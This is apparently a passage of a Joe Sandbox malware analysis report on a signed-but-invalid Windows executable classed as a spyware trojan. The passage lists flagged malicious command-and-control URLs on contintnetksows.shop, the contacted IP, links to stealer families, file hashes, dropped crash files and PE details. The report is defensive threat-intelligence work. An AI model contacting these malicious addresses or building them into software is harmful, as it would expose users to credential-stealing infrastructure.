                https://contintnetksows.shop/apiT6RVmzn1DzL.exe, 00000000.00000003.2185036243.00000000012A0000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2184883845.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2184975566.000000000129C000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://www.yubsoft.com6RVmzn1DzL.exefalse
                • Avira URL Cloud: safe
                		unknown
                https://contintnetksows.shop:443/api6RVmzn1DzL.exe, 00000000.00000002.2398263626.0000000001218000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=6RVmzn1DzL.exe, 00000000.00000003.2134741548.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134571691.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134615582.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://crl.rootca1.amazontrust.com/rootca1.crl06RVmzn1DzL.exe, 00000000.00000003.2157989801.0000000003B02000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://upx.sf.netAmcache.hve.5.drfalse
                • URL Reputation: safe
                		unknown
                https://contintnetksows.shop:443/api)6RVmzn1DzL.exe, 00000000.00000002.2398263626.0000000001218000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                https://contintnetksows.shop/%%6RVmzn1DzL.exe, 00000000.00000003.2146970871.000000000123E000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://ocsp.rootca1.amazontrust.com0:6RVmzn1DzL.exe, 00000000.00000003.2157989801.0000000003B02000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.ecosia.org/newtab/6RVmzn1DzL.exe, 00000000.00000003.2134741548.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134571691.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134615582.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta6RVmzn1DzL.exe, 00000000.00000003.2159383496.00000000012CE000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br6RVmzn1DzL.exe, 00000000.00000003.2159036382.0000000003C15000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://ac.ecosia.org/autocomplete?q=6RVmzn1DzL.exe, 00000000.00000003.2134741548.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134571691.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134615582.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://crls.ssl.com/ssl.com-rsa-RootCA.crl06RVmzn1DzL.exefalse
                • Avira URL Cloud: safe
                		unknown
                https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg6RVmzn1DzL.exe, 00000000.00000003.2159383496.00000000012CE000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl06RVmzn1DzL.exefalse
                • Avira URL Cloud: safe
                		unknown
                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg6RVmzn1DzL.exe, 00000000.00000003.2159383496.00000000012CE000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://contintnetksows.shop/e6RVmzn1DzL.exe, 00000000.00000003.2169631101.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169734617.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169841137.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169785015.000000000129B000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://crt.rootca1.amazontrust.com/rootca1.cer0?6RVmzn1DzL.exe, 00000000.00000003.2157989801.0000000003B02000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contintnetksows.shop/a6RVmzn1DzL.exe, 00000000.00000003.2169785015.000000000129B000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://contintnetksows.shop/s86RVmzn1DzL.exe, 00000000.00000003.2185036243.00000000012A0000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2184883845.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2184975566.000000000129C000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2185058375.00000000012AC000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref6RVmzn1DzL.exe, 00000000.00000003.2159383496.00000000012CE000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/imgdrive/Folder2ISO6RVmzn1DzL.exefalse
                • Avira URL Cloud: safe
                		unknown
                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde74776RVmzn1DzL.exe, 00000000.00000003.2159383496.00000000012CE000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://contintnetksows.shop/api$6RVmzn1DzL.exe, 00000000.00000003.2146970871.000000000123E000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt06RVmzn1DzL.exefalse
                • Avira URL Cloud: safe
                		unknown
                https://contintnetksows.shop/s6RVmzn1DzL.exe, 00000000.00000003.2185036243.00000000012A0000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2184883845.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2184975566.000000000129C000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2185058375.00000000012AC000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=6RVmzn1DzL.exe, 00000000.00000003.2134741548.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134571691.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134615582.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contintnetksows.shop/api%6RVmzn1DzL.exe, 00000000.00000002.2398263626.0000000001283000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://contintnetksows.shop/p6RVmzn1DzL.exe, 00000000.00000003.2185036243.00000000012A0000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2185058375.00000000012AC000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                172.67.141.234
                		contintnetksows.shopUnited States
                		13335CLOUDFLARENETUStrue

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1465909
                Start date and time:2024-07-02 08:31:53 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 29s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:9
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:6RVmzn1DzL.exe
                renamed because original name is a hash value
                Original Sample Name:4d73427dc0b9f3dc4b846ace0ddc2deb.exe
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@2/5@1/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 38
                • Number of non-executed functions: 193
                Cookbook Comments:
                • Found application associated with file extension: .exe

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 104.208.16.94
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ocsps.ssl.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                • Report size getting too big, too many NtOpenFile calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                02:32:51API Interceptor9x Sleep call for process: 6RVmzn1DzL.exe modified
                02:33:19API Interceptor1x Sleep call for process: WerFault.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                CLOUDFLARENETUSZiraat Bankasi Swift Mesaji.exeGet hashmaliciousGuLoaderBrowse
                • 172.67.74.152
                DHL AWB COMMERCAIL INVOICE AND TRACKNG DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                • 104.26.13.205
                orden de compra.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                • 188.114.96.3
                https://128.165.205.92.host.secureserver.net/Get hashmaliciousHTMLPhisherBrowse
                • 1.1.1.1
                Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousGuLoaderBrowse
                • 104.26.13.205
                JDownloaderSetup.exeGet hashmaliciousUnknownBrowse
                • 104.16.148.130
                JDownloaderSetup.exeGet hashmaliciousUnknownBrowse
                • 104.16.148.130
                FedEx Receipt_53065724643.xlsGet hashmaliciousFormBookBrowse
                • 188.114.96.3
                SecuriteInfo.com.Win32.Evo-gen.6791.6790.exeGet hashmaliciousPython Stealer, CStealer, XmrigBrowse
                • 104.26.2.16
                http://differentia.ruGet hashmaliciousUnknownBrowse
                • 172.67.71.89

                JA3 Fingerprints

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                a0e9f5d64349fb13191bc781f81f42e1Build.exeGet hashmaliciousDBatLoader, NeshtaBrowse
                • 172.67.141.234
                F.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
                • 172.67.141.234
                1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                • 172.67.141.234
                MOD_200.pdf.lnkGet hashmaliciousArc StealerBrowse
                • 172.67.141.234
                INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousUnknownBrowse
                • 172.67.141.234
                capisp.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                • 172.67.141.234
                20240506_120821.xlsGet hashmaliciousUnknownBrowse
                • 172.67.141.234
                Renameme@1.xlsGet hashmaliciousUnknownBrowse
                • 172.67.141.234
                mkFOY01Gl5.exeGet hashmaliciousLummaCBrowse
                • 172.67.141.234
                zyJWi2vy29.exeGet hashmaliciousLummaC, PureLog Stealer, RisePro Stealer, Vidar, zgRATBrowse
                • 172.67.141.234

                Dropped Files

                No context

                Created / dropped Files

                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_6RVmzn1DzL.exe_7bfb277fee81bf1a20749b653394791c3aa9112c_462bbcf1_b313c709-504a-4fb8-84c2-c4704d4cf20e\Report.wer

                Download File
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):65536
                Entropy (8bit):1.0425415904336832
                Encrypted:false
                SSDEEP:192://NtB5+s0BU/gjZ/exMzuiFizZ24IO8+U0N:3NtB5+nBU/gjTzuiFizY4IO8+U
                MD5:30CCF4BCB2EBB9C9A662D363FAD114A5
                SHA1:0705B0DEF6D3BA7A4A96D5F2AE9E6A639A82689D
                SHA-256:9364B4194B3A69386A69D7837B70DEB925681EC03653A72E0C4E281FB8C2AC61
                SHA-512:6794BF729363514B42E01720381057E26369FEF9980AE050F636AC3783F2ACE419600B8D396742608F654888DBC9E9DB98DD426828880E25DEF87C94933302F5
                Malicious:true
                Reputation:low
                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.4.3.7.5.5.8.4.2.5.6.6.7.6.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.4.3.7.5.5.8.5.0.9.8.0.9.8.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.3.1.3.c.7.0.9.-.5.0.4.a.-.4.f.b.8.-.8.4.c.2.-.c.4.7.0.4.d.4.c.f.2.0.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.2.1.2.6.f.1.6.-.7.6.a.f.-.4.7.a.2.-.9.b.3.0.-.7.0.6.5.a.3.2.9.2.2.c.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.6.R.V.m.z.n.1.D.z.L...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.f.o.l.d.e.r.2.i.s.o...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.c.c.-.0.0.0.1.-.0.0.1.4.-.4.3.6.c.-.6.e.a.3.4.9.c.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.b.c.c.4.4.5.7.6.f.2.e.e.7.2.4.f.c.7.e.1.f.6.8.e.1.d.c.7.6.4.8.0.0.0.0.0.9.0.4.!.0.0.0.0.4.3.b.8.f.f.a.0.9.8.2.6.c.2.1.6.7.6.d.7.5.9.c.0.f.3.d.c.2.0.8.8.c.

                C:\ProgramData\Microsoft\Windows\WER\Temp\WERA461.tmp.dmp

                Download File
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Mini DuMP crash report, 15 streams, Tue Jul 2 06:33:04 2024, 0x1205a4 type
                Category:dropped
                Size (bytes):125340
                Entropy (8bit):1.9963464189301523
                Encrypted:false
                SSDEEP:768:3ViXRpG8BTkqQ2QE0NWmQZ/48wnmphSkIrX:F07QNBE0NW9/on4grX
                MD5:A7F395E348CB55E695CE5F3CC20D7AC0
                SHA1:D6FB083102C88A6038918B172B1B2D920842B4F6
                SHA-256:BF1F1C9D92FEA8734B2D002E91B7CC5DBA7A633BE3A4BC0985D12D92BBF0E3BE
                SHA-512:1537E4BE3473944AC87F805B9CCE21392A806703078205108053CDC1C17E6421EF9D841F59CB35F0E787421B7A9BAC3605EBB52F42433FE9469F86B356C87D0E
                Malicious:false
                Reputation:low
                Preview:MDMP..a..... ....... ..f........................T...(...........|"......D....Q..........`.......8...........T............?............. $...........&..............................................................................eJ.......&......GenuineIntel............T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\ProgramData\Microsoft\Windows\WER\Temp\WERA6A5.tmp.WERInternalMetadata.xml

                Download File
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):8378
                Entropy (8bit):3.706154048719564
                Encrypted:false
                SSDEEP:192:R6l7wVeJ5r6IR1i6YEIHSU9o2hgmfp4HHrpry89bx6sf07m:R6lXJF6I26YE4SU9o2hgmfp4H9xZf1
                MD5:76B8BD5C5FD9182337B1C11D0A5581F1
                SHA1:505A29EC3E640D4C389B931A6FB9D91438D28833
                SHA-256:BA14A88F2487F811799AFC4864DB80D8E23F79B360B839410F4286A4C31614CC
                SHA-512:458A5A895E736E1D337DA43079E4669E9DB177D1AC055F292282910BACDDF30E4B126ABAF8594E7B9E51E60EDE8A32D36E46D0FDDB91254626F7EAA442A6E8FB
                Malicious:false
                Reputation:low
                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.2.7.6.<./.P.i.

                C:\ProgramData\Microsoft\Windows\WER\Temp\WERA6D4.tmp.xml

                Download File
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):4688
                Entropy (8bit):4.509997748119072
                Encrypted:false
                SSDEEP:48:cvIwWl8zs3Jg77aI9iVWpW8VYmYm8M4JeltgF7+q8Hr7E8aeSrSud:uIjfZI7Qk7VGJF0cRWud
                MD5:1BF3B3B1A4BA7FCD9FCE3ED87D6407CE
                SHA1:B010154566EDA41C07748ED9A44939BE3078B62A
                SHA-256:0F7BF3F3987DA820FF8E1B9CD43EB2B0DE24D3DEF16763EBD902056E070D022C
                SHA-512:97907145C9A8F53187D94C0E2E572B400E0CFB2A9A134619E9DABB89A52EDE8C51B89152486E23CA45D0BE907D8DFC8424E79219FD1FD98FDA61E460B525D436
                Malicious:false
                Reputation:low
                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="392975" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                C:\Windows\appcompat\Programs\Amcache.hve

                Download File
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:MS Windows registry file, NT/2000 or above
                Category:dropped
                Size (bytes):1835008
                Entropy (8bit):4.42177513978557
                Encrypted:false
                SSDEEP:6144:lSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNc0uhiTw:svloTMW+EZMM6DFyG03w
                MD5:E97F9E0CFB511850F2BE57E438CB8E99
                SHA1:6C56D60BA4B10F83F73A4A7CA1090C4DB6B3F84D
                SHA-256:DDFCB9F302309B0CF8344E4D2FA7DD6D74271448FF5A01E61363D23B8BD17CCD
                SHA-512:FF8C28186D74BCAD6481458A9973A0C02D9DE079386538777A72575B92D9E151323224D20570B0928A80716BEE33D5D7F1E195BDEA6E328014253DC12D36824D
                Malicious:false
                Reputation:low
                Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..T.I.................................................................................................................................................................................................................................................................................................................................................B.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.568469104991779
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:6RVmzn1DzL.exe
                File size:587'168 bytes
                MD5:4d73427dc0b9f3dc4b846ace0ddc2deb
                SHA1:43b8ffa09826c21676d759c0f3dc2088c4df4efe
                SHA256:0d7b87b394b0620f352a3dd9391b202ff85c2659a007b74caf11799fc51e1e09
                SHA512:b66b5b2beeec4174ff9f644b105c10e757e18211a55b7c5b5d9ed9745c0cdc191f7c427d00518cab63427d92d9122922de92db3d448a6ef347f5c5e778d5067f
                SSDEEP:12288:GGbKDjKEJZALcCAgqW++rNWq3nmK6JqpJjAsE:G1K8Z4cCPqW+kAqrjjjAx
                TLSH:3EC4D059B6D0C4F1D5F70233ACF3872D6AA6BCA2CF34904E239677492C316528A26777
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........?.F`Q.F`Q.F`Q.....R`Q......`Q.K2..O`Q.K2..E`Q.K2..S`Q.O...G`Q......`Q.O...U`Q.F`P..`Q.....@`Q.K2..G`Q.....G`Q.RichF`Q........

                File Icon

                Icon Hash:221266d6b2b692b6

                Static PE Info

                General

                Entrypoint:0x40f4c2
                Entrypoint Section:.text
                Digitally signed:true
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Time Stamp:0x667209E7 [Tue Jun 18 22:27:51 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:6
                OS Version Minor:0
                File Version Major:6
                File Version Minor:0
                Subsystem Version Major:6
                Subsystem Version Minor:0
                Import Hash:aff40d5954acc9dc8618ed5e4332d20d

                Authenticode Signature

                Signature Valid:false
                Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                Signature Validation Error:The digital signature of the object did not verify
                Error Number:-2146869232
                Not Before, Not After
                • 19/09/2022 16:03:13 29/08/2025 16:53:42
                Subject Chain
                • OID.1.3.6.1.4.1.311.60.2.1.3=CN, OID.2.5.4.15=Private Organization, CN="Yubi Software (Linyi) Co., Ltd.", SERIALNUMBER=91371300MABX6G2P0P, O="Yubi Software (Linyi) Co., Ltd.", L=Linyi, C=CN
                Version:3
                Thumbprint MD5:AC766C00A8E56B85549080A0FF03B1C6
                Thumbprint SHA-1:0EBC26DC13DA9132A1E41632E63373C093094565
                Thumbprint SHA-256:1CA87CE957E83D323EEE91CD0B2624A0B7C2578EAA410CDA17E6DCA46CAA0774
                Serial:1397F7A664D0A258D2FCD6A646AD1A52

                Entrypoint Preview

                Instruction
                call 00007F220C6E9E58h
                jmp 00007F220C6E5065h
                push 00000010h
                push 0042C5D8h
                call 00007F220C6E8B7Dh
                call 00007F220C6E8DE3h
                movzx esi, ax
                push 00000002h
                call 00007F220C6E9DF2h
                pop ecx
                call 00007F220C6E95D0h
                test eax, eax
                jne 00007F220C6E506Ah
                push 0000001Ch
                call 00007F220C6E511Bh
                pop ecx
                call 00007F220C6E952Ch
                test eax, eax
                jne 00007F220C6E506Ah
                push 00000010h
                call 00007F220C6E510Ah
                pop ecx
                call 00007F220C6E9EACh
                and dword ptr [ebp-04h], 00000000h
                call 00007F220C6E95BAh
                test eax, eax
                jns 00007F220C6E506Ah
                push 0000001Bh
                call 00007F220C6E50F0h
                pop ecx
                call dword ptr [00422158h]
                mov dword ptr [0043271Ch], eax
                call 00007F220C6E9EC7h
                mov dword ptr [004308B0h], eax
                call 00007F220C6E983Fh
                test eax, eax
                jns 00007F220C6E506Ah
                push 00000008h
                call 00007F220C6E870Ch
                pop ecx
                call 00007F220C6E9A6Eh
                test eax, eax
                jns 00007F220C6E506Ah
                push 00000009h
                call 00007F220C6E86FBh
                pop ecx
                push 00000001h
                call 00007F220C6E870Dh
                pop ecx
                test eax, eax
                je 00007F220C6E5069h
                push eax
                call 00007F220C6E86E8h
                pop ecx
                call 00007F220C6E9F0Dh
                push esi
                push eax
                push 00000000h
                push 00400000h
                call 00007F220C6D8697h
                mov dword ptr [ebp-20h], eax
                push eax
                call 00007F220C6E8946h

                Rich Headers

                Programming Language:
                • [ASM] VS2013 UPD5 build 40629
                • [ C ] VS2013 UPD5 build 40629
                • [ASM] VS2013 build 21005
                • [C++] VS2013 build 21005
                • [ C ] VS2013 build 21005
                • [ C ] VS2008 SP1 build 30729
                • [C++] VS2013 UPD5 build 40629
                • [IMP] VS2008 SP1 build 30729
                • [RES] VS2013 build 21005
                • [LNK] VS2013 UPD5 build 40629

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x2cc980xc8.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x330000x9ee8.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x8d8000x1da0.reloc
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x3d0000x20e4.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x222e00x38.rdata
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2afc00x40.rdata
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x220000x28c.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x20da00x20e00578213f60df04180efec215a7f0a35bbFalse0.6177519011406845data6.7963959121372595IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rdata0x220000xbaf40xbc00cdc1c6b92591f123cc534d42e4305cbcFalse0.3902094414893617data4.720654860732534IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
